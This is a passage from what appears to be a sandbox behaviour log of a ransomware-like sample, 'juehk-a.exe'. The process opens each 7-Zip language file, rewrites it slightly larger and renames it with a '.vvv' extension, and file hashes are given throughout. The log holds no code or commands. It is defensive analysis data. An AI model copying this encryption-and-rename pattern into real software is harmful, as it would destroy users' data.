12685.          processinfo:
12686.            pid: 1648
12687.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12688.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12689.            ads:
12690.          fid (ads:): 562949953519775
12691.          ntstatus: 0x0
12692.          CreateOptions: 0x60
12693.        file:
12694.          timestamp: 69440
12695.          mode: close
12696.          sequenceNumber: 911
12697.          value: C:\Program Files\7-Zip\Lang\sa.txt
12698.          filesize: 28862
12699.          md5sum: ca256e7a3ee106fbda45ea72aaaa40e5
12700.          sha1sum: f4d19aa893a4ecf755b27eeca57542cb83f8a549
12701.          processinfo:
12702.            pid: 1648
12703.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12704.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12705.            ads:
12706.          fid (ads:): 562949953519775
12707.          ntstatus: 0x0
12708.          CreateOptions: 0x0
12709.        file:
12710.          timestamp: 69499
12711.          mode: rename
12712.          sequenceNumber: 912
12713.          filesize: 28862
12714.          md5sum: ca256e7a3ee106fbda45ea72aaaa40e5
12715.          sha1sum: f4d19aa893a4ecf755b27eeca57542cb83f8a549
12716.          processinfo:
12717.            pid: 1648
12718.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12719.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12720.          old_name: C:\Program Files\7-Zip\Lang\sa.txt
12721.          new_name: C:\Program Files\7-Zip\Lang\sa.txt.vvv
12722.            ads:
12723.          fid (ads:): 562949953519775
12724.          ntstatus: 0x0
12725.          CreateOptions: 0x0
12726.        file:
12727.          timestamp: 69507
12728.          mode: open
12729.          sequenceNumber: 913
12730.          value: C:\Program Files\7-Zip\Lang\si.txt
12731.          filesize: 25126
12732.          processinfo:
12733.            pid: 1648
12734.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12735.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12736.            ads:
12737.          fid (ads:): 562949953519776
12738.          ntstatus: 0x0
12739.          CreateOptions: 0x60
12740.        file:
12741.          timestamp: 69739
12742.          mode: close
12743.          sequenceNumber: 914
12744.          value: C:\Program Files\7-Zip\Lang\si.txt
12745.          filesize: 25550
12746.          md5sum: 009ec5ae9589a891580e78687d435e4c
12747.          sha1sum: 6d37ee7433e0f076f4dc6c454908983b82615545
12748.          processinfo:
12749.            pid: 1648
12750.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12751.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12752.            ads:
12753.          fid (ads:): 562949953519776
12754.          ntstatus: 0x0
12755.          CreateOptions: 0x0
12756.        file:
12757.          timestamp: 69753
12758.          mode: rename
12759.          sequenceNumber: 915
12760.          filesize: 25550
12761.          md5sum: 009ec5ae9589a891580e78687d435e4c
12762.          sha1sum: 6d37ee7433e0f076f4dc6c454908983b82615545
12763.          processinfo:
12764.            pid: 1648
12765.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12766.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12767.          old_name: C:\Program Files\7-Zip\Lang\si.txt
12768.          new_name: C:\Program Files\7-Zip\Lang\si.txt.vvv
12769.            ads:
12770.          fid (ads:): 562949953519776
12771.          ntstatus: 0x0
12772.          CreateOptions: 0x0
12773.        file:
12774.          timestamp: 69767
12775.          mode: open
12776.          sequenceNumber: 916
12777.          value: C:\Program Files\7-Zip\Lang\sk.txt
12778.          filesize: 14323
12779.          processinfo:
12780.            pid: 1648
12781.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12782.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12783.            ads:
12784.          fid (ads:): 562949953519777
12785.          ntstatus: 0x0
12786.          CreateOptions: 0x60
12787.        file:
12788.          timestamp: 69776
12789.          mode: close
12790.          sequenceNumber: 917
12791.          value: C:\Program Files\7-Zip\Lang\sk.txt
12792.          filesize: 14750
12793.          md5sum: 8dd45d0b00d74b15cd2e3305b7ac8832
12794.          sha1sum: 0ea9ed4a9538f73cc0c360ac30a812a4e722734a
12795.          processinfo:
12796.            pid: 1648
12797.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12798.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12799.            ads:
12800.          fid (ads:): 562949953519777
12801.          ntstatus: 0x0
12802.          CreateOptions: 0x0
12803.        file:
12804.          timestamp: 69786
12805.          mode: rename
12806.          sequenceNumber: 918
12807.          filesize: 14750
12808.          md5sum: 8dd45d0b00d74b15cd2e3305b7ac8832
12809.          sha1sum: 0ea9ed4a9538f73cc0c360ac30a812a4e722734a
12810.          processinfo:
12811.            pid: 1648
12812.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12813.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12814.          old_name: C:\Program Files\7-Zip\Lang\sk.txt
12815.          new_name: C:\Program Files\7-Zip\Lang\sk.txt.vvv
12816.            ads:
12817.          fid (ads:): 562949953519777
12818.          ntstatus: 0x0
12819.          CreateOptions: 0x0
12820.        file:
12821.          timestamp: 69791
12822.          mode: open
12823.          sequenceNumber: 919
12824.          value: C:\Program Files\7-Zip\Lang\sl.txt
12825.          filesize: 12419
12826.          processinfo:
12827.            pid: 1648
12828.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12829.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12830.            ads:
12831.          fid (ads:): 562949953519778
12832.          ntstatus: 0x0
12833.          CreateOptions: 0x60
12834.        file:
12835.          timestamp: 69796
12836.          mode: close
12837.          sequenceNumber: 920
12838.          value: C:\Program Files\7-Zip\Lang\sl.txt
12839.          filesize: 12846
12840.          md5sum: 835b55e4349f7068443c27e87ce527e3
12841.          sha1sum: cca195f1ecf88602b9c3a8b30e423fd52826a8d6
12842.          processinfo:
12843.            pid: 1648
12844.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12845.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12846.            ads:
12847.          fid (ads:): 562949953519778
12848.          ntstatus: 0x0
12849.          CreateOptions: 0x0
12850.        file:
12851.          timestamp: 69830
12852.          mode: rename
12853.          sequenceNumber: 921
12854.          filesize: 12846
12855.          md5sum: 835b55e4349f7068443c27e87ce527e3
12856.          sha1sum: cca195f1ecf88602b9c3a8b30e423fd52826a8d6
12857.          processinfo:
12858.            pid: 1648
12859.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12860.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12861.          old_name: C:\Program Files\7-Zip\Lang\sl.txt
12862.          new_name: C:\Program Files\7-Zip\Lang\sl.txt.vvv
12863.            ads:
12864.          fid (ads:): 562949953519778
12865.          ntstatus: 0x0
12866.          CreateOptions: 0x0
12867.        file:
12868.          timestamp: 69835
12869.          mode: open
12870.          sequenceNumber: 922
12871.          value: C:\Program Files\7-Zip\Lang\sq.txt
12872.          filesize: 11588
12873.          processinfo:
12874.            pid: 1648
12875.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12876.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12877.            ads:
12878.          fid (ads:): 562949953519779
12879.          ntstatus: 0x0
12880.          CreateOptions: 0x60
12881.        file:
12882.          timestamp: 69930
12883.          mode: close
12884.          sequenceNumber: 923
12885.          value: C:\Program Files\7-Zip\Lang\sq.txt
12886.          filesize: 12014
12887.          md5sum: 280b2fbd26d9925f3686f60346f70249
12888.          sha1sum: 5193813051365b70dca115dab792dace06716da3
12889.          processinfo:
12890.            pid: 1648
12891.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12892.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12893.            ads:
12894.          fid (ads:): 562949953519779
12895.          ntstatus: 0x0
12896.          CreateOptions: 0x0
12897.        file:
12898.          timestamp: 69952
12899.          mode: rename
12900.          sequenceNumber: 924
12901.          filesize: 12014
12902.          md5sum: 280b2fbd26d9925f3686f60346f70249
12903.          sha1sum: 5193813051365b70dca115dab792dace06716da3
12904.          processinfo:
12905.            pid: 1648
12906.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12907.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12908.          old_name: C:\Program Files\7-Zip\Lang\sq.txt
12909.          new_name: C:\Program Files\7-Zip\Lang\sq.txt.vvv
12910.            ads:
12911.          fid (ads:): 562949953519779
12912.          ntstatus: 0x0
12913.          CreateOptions: 0x0
12914.        file:
12915.          timestamp: 69986
12916.          mode: open
12917.          sequenceNumber: 925
12918.          value: C:\Program Files\7-Zip\Lang\sr-spc.txt
12919.          filesize: 19089
12920.          processinfo:
12921.            pid: 1648
12922.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12923.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12924.            ads:
12925.          fid (ads:): 562949953519781
12926.          ntstatus: 0x0
12927.          CreateOptions: 0x60
12928.        file:
12929.          timestamp: 70309
12930.          mode: close
12931.          sequenceNumber: 926
12932.          value: C:\Program Files\7-Zip\Lang\sr-spc.txt
12933.          filesize: 19518
12934.          md5sum: b01647ce4c7d2e170dbdd41f7e8af941
12935.          sha1sum: 3bfb16d4237668134edf98a331e3e68cb6262ed3
12936.          processinfo:
12937.            pid: 1648
12938.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12939.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12940.            ads:
12941.          fid (ads:): 562949953519781
12942.          ntstatus: 0x0
12943.          CreateOptions: 0x0
12944.        file:
12945.          timestamp: 70331
12946.          mode: rename
12947.          sequenceNumber: 927
12948.          filesize: 19518
12949.          md5sum: b01647ce4c7d2e170dbdd41f7e8af941
12950.          sha1sum: 3bfb16d4237668134edf98a331e3e68cb6262ed3
12951.          processinfo:
12952.            pid: 1648
12953.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12954.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12955.          old_name: C:\Program Files\7-Zip\Lang\sr-spc.txt
12956.          new_name: C:\Program Files\7-Zip\Lang\sr-spc.txt.vvv
12957.            ads:
12958.          fid (ads:): 562949953519781
12959.          ntstatus: 0x0
12960.          CreateOptions: 0x0
12961.        file:
12962.          timestamp: 70338
12963.          mode: open
12964.          sequenceNumber: 928
12965.          value: C:\Program Files\7-Zip\Lang\sr-spl.txt
12966.          filesize: 13378
12967.          processinfo:
12968.            pid: 1648
12969.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12970.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12971.            ads:
12972.          fid (ads:): 562949953519780
12973.          ntstatus: 0x0
12974.          CreateOptions: 0x60
12975.        file:
12976.          timestamp: 70366
12977.          mode: close
12978.          sequenceNumber: 929
12979.          value: C:\Program Files\7-Zip\Lang\sr-spl.txt
12980.          filesize: 13806
12981.          md5sum: 0dd0e1bdf59f91c2a764c07b614e0a64
12982.          sha1sum: 37d580e0f3ff69be44b33597182f7febd78e8f90
12983.          processinfo:
12984.            pid: 1648
12985.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
12986.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
12987.            ads:
12988.          fid (ads:): 562949953519780
12989.          ntstatus: 0x0
12990.          CreateOptions: 0x0
12991.        file:
12992.          timestamp: 70374
12993.          mode: rename
12994.          sequenceNumber: 930
12995.          filesize: 13806
12996.          md5sum: 0dd0e1bdf59f91c2a764c07b614e0a64
12997.          sha1sum: 37d580e0f3ff69be44b33597182f7febd78e8f90
12998.          processinfo:
12999.            pid: 1648
13000.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13001.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13002.          old_name: C:\Program Files\7-Zip\Lang\sr-spl.txt
13003.          new_name: C:\Program Files\7-Zip\Lang\sr-spl.txt.vvv
13004.            ads:
13005.          fid (ads:): 562949953519780
13006.          ntstatus: 0x0
13007.          CreateOptions: 0x0
13008.        file:
13009.          timestamp: 70382
13010.          mode: open
13011.          sequenceNumber: 931
13012.          value: C:\Program Files\7-Zip\Lang\sv.txt
13013.          filesize: 13743
13014.          processinfo:
13015.            pid: 1648
13016.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13017.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13018.            ads:
13019.          fid (ads:): 562949953519782
13020.          ntstatus: 0x0
13021.          CreateOptions: 0x60
13022.        file:
13023.          timestamp: 70500
13024.          mode: close
13025.          sequenceNumber: 932
13026.          value: C:\Program Files\7-Zip\Lang\sv.txt
13027.          filesize: 14158
13028.          md5sum: bc2044bc16202eb3dae152e6f64c22b2
13029.          sha1sum: f1a84e521020f5588e312fe847a452dfd779887b
13030.          processinfo:
13031.            pid: 1648
13032.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13033.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13034.            ads:
13035.          fid (ads:): 562949953519782
13036.          ntstatus: 0x0
13037.          CreateOptions: 0x0
13038.        file:
13039.          timestamp: 70550
13040.          mode: rename
13041.          sequenceNumber: 933
13042.          filesize: 14158
13043.          md5sum: bc2044bc16202eb3dae152e6f64c22b2
13044.          sha1sum: f1a84e521020f5588e312fe847a452dfd779887b
13045.          processinfo:
13046.            pid: 1648
13047.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13048.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13049.          old_name: C:\Program Files\7-Zip\Lang\sv.txt
13050.          new_name: C:\Program Files\7-Zip\Lang\sv.txt.vvv
13051.            ads:
13052.          fid (ads:): 562949953519782
13053.          ntstatus: 0x0
13054.          CreateOptions: 0x0
13055.        file:
13056.          timestamp: 70559
13057.          mode: open
13058.          sequenceNumber: 934
13059.          value: C:\Program Files\7-Zip\Lang\ta.txt
13060.          filesize: 20476
13061.          processinfo:
13062.            pid: 1648
13063.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13064.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13065.            ads:
13066.          fid (ads:): 562949953519783
13067.          ntstatus: 0x0
13068.          CreateOptions: 0x60
13069.        file:
13070.          timestamp: 70805
13071.          mode: close
13072.          sequenceNumber: 935
13073.          value: C:\Program Files\7-Zip\Lang\ta.txt
13074.          filesize: 20894
13075.          md5sum: faca4398d99121b1d7c1822017a721e4
13076.          sha1sum: 8112e0a97aaf559c062dbc5882673b43aa9ae600
13077.          processinfo:
13078.            pid: 1648
13079.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13080.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13081.            ads:
13082.          fid (ads:): 562949953519783
13083.          ntstatus: 0x0
13084.          CreateOptions: 0x0
13085.        file:
13086.          timestamp: 70866
13087.          mode: rename
13088.          sequenceNumber: 936
13089.          filesize: 20894
13090.          md5sum: faca4398d99121b1d7c1822017a721e4
13091.          sha1sum: 8112e0a97aaf559c062dbc5882673b43aa9ae600
13092.          processinfo:
13093.            pid: 1648
13094.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13095.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13096.          old_name: C:\Program Files\7-Zip\Lang\ta.txt
13097.          new_name: C:\Program Files\7-Zip\Lang\ta.txt.vvv
13098.            ads:
13099.          fid (ads:): 562949953519783
13100.          ntstatus: 0x0
13101.          CreateOptions: 0x0
13102.        file:
13103.          timestamp: 70876
13104.          mode: open
13105.          sequenceNumber: 937
13106.          value: C:\Program Files\7-Zip\Lang\th.txt
13107.          filesize: 24112
13108.          processinfo:
13109.            pid: 1648
13110.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13111.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13112.            ads:
13113.          fid (ads:): 562949953519784
13114.          ntstatus: 0x0
13115.          CreateOptions: 0x60
13116.        file:
13117.          timestamp: 70902
13118.          mode: close
13119.          sequenceNumber: 938
13120.          value: C:\Program Files\7-Zip\Lang\th.txt
13121.          filesize: 24542
13122.          md5sum: ed8808fdafcd013866e421c673548432
13123.          sha1sum: 5a1904778d5a5c9a75983246df3dfd7ac56787b8
13124.          processinfo:
13125.            pid: 1648
13126.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13127.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13128.            ads:
13129.          fid (ads:): 562949953519784
13130.          ntstatus: 0x0
13131.          CreateOptions: 0x0
13132.        file:
13133.          timestamp: 70908
13134.          mode: rename
13135.          sequenceNumber: 939
13136.          filesize: 24542
13137.          md5sum: ed8808fdafcd013866e421c673548432
13138.          sha1sum: 5a1904778d5a5c9a75983246df3dfd7ac56787b8
13139.          processinfo:
13140.            pid: 1648
13141.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13142.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13143.          old_name: C:\Program Files\7-Zip\Lang\th.txt
13144.          new_name: C:\Program Files\7-Zip\Lang\th.txt.vvv
13145.            ads:
13146.          fid (ads:): 562949953519784
13147.          ntstatus: 0x0
13148.          CreateOptions: 0x0
13149.        file:
13150.          timestamp: 70913
13151.          mode: open
13152.          sequenceNumber: 940
13153.          value: C:\Program Files\7-Zip\Lang\tr.txt
13154.          filesize: 13497
13155.          processinfo:
13156.            pid: 1648
13157.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13158.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13159.            ads:
13160.          fid (ads:): 562949953519785
13161.          ntstatus: 0x0
13162.          CreateOptions: 0x60
13163.        file:
13164.          timestamp: 70920
13165.          mode: close
13166.          sequenceNumber: 941
13167.          value: C:\Program Files\7-Zip\Lang\tr.txt
13168.          filesize: 13918
13169.          md5sum: f2d52642c65b02bf46067ac2dedcb375
13170.          sha1sum: fdeb9f92cc7f932dddd01c6e3952c6b285ff24ce
13171.          processinfo:
13172.            pid: 1648
13173.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13174.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13175.            ads:
13176.          fid (ads:): 562949953519785
13177.          ntstatus: 0x0
13178.          CreateOptions: 0x0
13179.        file:
13180.          timestamp: 70927
13181.          mode: rename
13182.          sequenceNumber: 942
13183.          filesize: 13918
13184.          md5sum: f2d52642c65b02bf46067ac2dedcb375
13185.          sha1sum: fdeb9f92cc7f932dddd01c6e3952c6b285ff24ce
13186.          processinfo:
13187.            pid: 1648
13188.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13189.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13190.          old_name: C:\Program Files\7-Zip\Lang\tr.txt
13191.          new_name: C:\Program Files\7-Zip\Lang\tr.txt.vvv
13192.            ads:
13193.          fid (ads:): 562949953519785
13194.          ntstatus: 0x0
13195.          CreateOptions: 0x0
13196.        file:
13197.          timestamp: 70934
13198.          mode: open
13199.          sequenceNumber: 943
13200.          value: C:\Program Files\7-Zip\Lang\tt.txt
13201.          filesize: 18409
13202.          processinfo:
13203.            pid: 1648
13204.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13205.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13206.            ads:
13207.          fid (ads:): 562949953519786
13208.          ntstatus: 0x0
13209.          CreateOptions: 0x60
13210.        file:
13211.          timestamp: 70942
13212.          mode: close
13213.          sequenceNumber: 944
13214.          value: C:\Program Files\7-Zip\Lang\tt.txt
13215.          filesize: 18830
13216.          md5sum: 6492f298761c9676c622d87791cf9067
13217.          sha1sum: 7264314a4480a804931651f6b70905c97d978017
13218.          processinfo:
13219.            pid: 1648
13220.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13221.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13222.            ads:
13223.          fid (ads:): 562949953519786
13224.          ntstatus: 0x0
13225.          CreateOptions: 0x0
13226.        file:
13227.          timestamp: 70950
13228.          mode: rename
13229.          sequenceNumber: 945
13230.          filesize: 18830
13231.          md5sum: 6492f298761c9676c622d87791cf9067
13232.          sha1sum: 7264314a4480a804931651f6b70905c97d978017
13233.          processinfo:
13234.            pid: 1648
13235.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13236.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13237.          old_name: C:\Program Files\7-Zip\Lang\tt.txt
13238.          new_name: C:\Program Files\7-Zip\Lang\tt.txt.vvv
13239.            ads:
13240.          fid (ads:): 562949953519786
13241.          ntstatus: 0x0
13242.          CreateOptions: 0x0
13243.        file:
13244.          timestamp: 70956
13245.          mode: open
13246.          sequenceNumber: 946
13247.          value: C:\Program Files\7-Zip\Lang\ug.txt
13248.          filesize: 18785
13249.          processinfo:
13250.            pid: 1648
13251.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13252.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13253.            ads:
13254.          fid (ads:): 562949953519787
13255.          ntstatus: 0x0
13256.          CreateOptions: 0x60
13257.        file:
13258.          timestamp: 70961
13259.          mode: close
13260.          sequenceNumber: 947
13261.          value: C:\Program Files\7-Zip\Lang\ug.txt
13262.          filesize: 19214
13263.          md5sum: 1991c9cb3111cf2dc9131d1664c7ff73
13264.          sha1sum: b3cb513cbad2b375195fedb402f47fe4d4050e96
13265.          processinfo:
13266.            pid: 1648
13267.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13268.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13269.            ads:
13270.          fid (ads:): 562949953519787
13271.          ntstatus: 0x0
13272.          CreateOptions: 0x0
13273.        file:
13274.          timestamp: 70970
13275.          mode: rename
13276.          sequenceNumber: 948
13277.          filesize: 19214
13278.          md5sum: 1991c9cb3111cf2dc9131d1664c7ff73
13279.          sha1sum: b3cb513cbad2b375195fedb402f47fe4d4050e96
13280.          processinfo:
13281.            pid: 1648
13282.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13283.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13284.          old_name: C:\Program Files\7-Zip\Lang\ug.txt
13285.          new_name: C:\Program Files\7-Zip\Lang\ug.txt.vvv
13286.            ads:
13287.          fid (ads:): 562949953519787
13288.          ntstatus: 0x0
13289.          CreateOptions: 0x0
13290.        file:
13291.          timestamp: 71003
13292.          mode: open
13293.          sequenceNumber: 949
13294.          value: C:\Program Files\7-Zip\Lang\uk.txt
13295.          filesize: 19729
13296.          processinfo:
13297.            pid: 1648
13298.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13299.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13300.            ads:
13301.          fid (ads:): 562949953519788
13302.          ntstatus: 0x0
13303.          CreateOptions: 0x60
13304.        file:
13305.          timestamp: 71038
13306.          mode: close
13307.          sequenceNumber: 950
13308.          value: C:\Program Files\7-Zip\Lang\uk.txt
13309.          filesize: 20158
13310.          md5sum: f1713b385ee387166aa27f5ef7282183
13311.          sha1sum: fb0542b9cf7e450d5a751d93e1a49ae703a09c47
13312.          processinfo:
13313.            pid: 1648
13314.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13315.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13316.            ads:
13317.          fid (ads:): 562949953519788
13318.          ntstatus: 0x0
13319.          CreateOptions: 0x0
13320.        file:
13321.          timestamp: 71123
13322.          mode: rename
13323.          sequenceNumber: 951
13324.          filesize: 20158
13325.          md5sum: f1713b385ee387166aa27f5ef7282183
13326.          sha1sum: fb0542b9cf7e450d5a751d93e1a49ae703a09c47
13327.          processinfo:
13328.            pid: 1648
13329.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13330.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13331.          old_name: C:\Program Files\7-Zip\Lang\uk.txt
13332.          new_name: C:\Program Files\7-Zip\Lang\uk.txt.vvv
13333.            ads:
13334.          fid (ads:): 562949953519788
13335.          ntstatus: 0x0
13336.          CreateOptions: 0x0
13337.        file:
13338.          timestamp: 71153
13339.          mode: open
13340.          sequenceNumber: 952
13341.          value: C:\Program Files\7-Zip\Lang\uz.txt
13342.          filesize: 10679
13343.          processinfo:
13344.            pid: 1648
13345.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13346.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13347.            ads:
13348.          fid (ads:): 562949953519789
13349.          ntstatus: 0x0
13350.          CreateOptions: 0x60
13351.        file:
13352.          timestamp: 71304
13353.          mode: close
13354.          sequenceNumber: 953
13355.          value: C:\Program Files\7-Zip\Lang\uz.txt
13356.          filesize: 11102
13357.          md5sum: e994144044b7bdb75ec5ccd49c74e09c
13358.          sha1sum: 1ad8330f0032649348fc479b4ef0d7455986ccb5
13359.          processinfo:
13360.            pid: 1648
13361.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13362.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13363.            ads:
13364.          fid (ads:): 562949953519789
13365.          ntstatus: 0x0
13366.          CreateOptions: 0x0
13367.        file:
13368.          timestamp: 71461
13369.          mode: rename
13370.          sequenceNumber: 954
13371.          filesize: 11102
13372.          md5sum: e994144044b7bdb75ec5ccd49c74e09c
13373.          sha1sum: 1ad8330f0032649348fc479b4ef0d7455986ccb5
13374.          processinfo:
13375.            pid: 1648
13376.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13377.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13378.          old_name: C:\Program Files\7-Zip\Lang\uz.txt
13379.          new_name: C:\Program Files\7-Zip\Lang\uz.txt.vvv
13380.            ads:
13381.          fid (ads:): 562949953519789
13382.          ntstatus: 0x0
13383.          CreateOptions: 0x0
13384.        file:
13385.          timestamp: 71495
13386.          mode: open
13387.          sequenceNumber: 955
13388.          value: C:\Program Files\7-Zip\Lang\va.txt
13389.          filesize: 12179
13390.          processinfo:
13391.            pid: 1648
13392.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13393.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13394.            ads:
13395.          fid (ads:): 562949953519790
13396.          ntstatus: 0x0
13397.          CreateOptions: 0x60
13398.        file:
13399.          timestamp: 71520
13400.          mode: close
13401.          sequenceNumber: 956
13402.          value: C:\Program Files\7-Zip\Lang\va.txt
13403.          filesize: 12606
13404.          md5sum: c17927f5c43d6ae60befd021ac5566c7
13405.          sha1sum: 000e2b8a1e76cd9f75daa4283f67d1a729be44cf
13406.          processinfo:
13407.            pid: 1648
13408.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13409.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13410.            ads:
13411.          fid (ads:): 562949953519790
13412.          ntstatus: 0x0
13413.          CreateOptions: 0x0
13414.        file:
13415.          timestamp: 71528
13416.          mode: rename
13417.          sequenceNumber: 957
13418.          filesize: 12606
13419.          md5sum: c17927f5c43d6ae60befd021ac5566c7
13420.          sha1sum: 000e2b8a1e76cd9f75daa4283f67d1a729be44cf
13421.          processinfo:
13422.            pid: 1648
13423.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13424.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13425.          old_name: C:\Program Files\7-Zip\Lang\va.txt
13426.          new_name: C:\Program Files\7-Zip\Lang\va.txt.vvv
13427.            ads:
13428.          fid (ads:): 562949953519790
13429.          ntstatus: 0x0
13430.          CreateOptions: 0x0
13431.        file:
13432.          timestamp: 71534
13433.          mode: open
13434.          sequenceNumber: 958
13435.          value: C:\Program Files\7-Zip\Lang\vi.txt
13436.          filesize: 13716
13437.          processinfo:
13438.            pid: 1648
13439.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13440.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13441.            ads:
13442.          fid (ads:): 562949953519791
13443.          ntstatus: 0x0
13444.          CreateOptions: 0x60
13445.        apicall:
13446.          timestamp: 71594
13447.          repeat: 400
13448.          sequenceNumber: 959
13449.          processinfo:
13450.            pid: 1648
13451.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13452.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13453.          dllname: kernel32.dll
13454.          apiname: Sleep
13455.          address: 0x0041ed5b
13456.        file:
13457.          timestamp: 71615
13458.          mode: close
13459.          sequenceNumber: 960
13460.          value: C:\Program Files\7-Zip\Lang\vi.txt
13461.          filesize: 14142
13462.          md5sum: fe7477c6f271ccee7efb0b4e7dc29802
13463.          sha1sum: aefa1b497fb4c04691ebf56499e171c2fed0e7c0
13464.          processinfo:
13465.            pid: 1648
13466.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
13467.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
13468.            ads:
13469.          fid (ads:): 562949953519791
13470.          ntstatus: 0x0
13471.          CreateOptions: 0x0
13472.        file:
13473.          timestamp: 71621
13474.          mode: rename
13475.          sequenceNumber: 961
13476.          filesize: 14142
13477.          md5sum: fe7477c6f271ccee7efb0b4e7dc29802
13478.          sha1sum: aefa1b497fb4c04691ebf56499e171c2fed0e7c0
13479.          processinfo:
